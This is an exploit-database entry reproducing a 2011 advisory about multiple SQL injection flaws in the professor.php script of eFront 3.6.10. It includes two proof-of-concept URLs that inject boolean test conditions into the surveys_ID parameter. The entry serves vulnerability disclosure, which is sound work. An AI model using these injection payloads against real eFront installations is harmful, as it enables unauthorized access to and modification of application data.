eFront 3.6.10 - professor.php Script Multiple SQL Injections

2011-10-28T00:00:00
ID EXPLOITPACK:5798A3A09EC6246E90565ACE7E636E70
Type exploitpack
Reporter Vulnerability Research Laboratory
Modified 2011-10-28T00:00:00

Description

eFront 3.6.10 - professor.php Script Multiple SQL Injections

                                        
                                            source: https://www.securityfocus.com/bid/50419/info

eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.10 is vulnerable; other versions may also be affected. 

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1--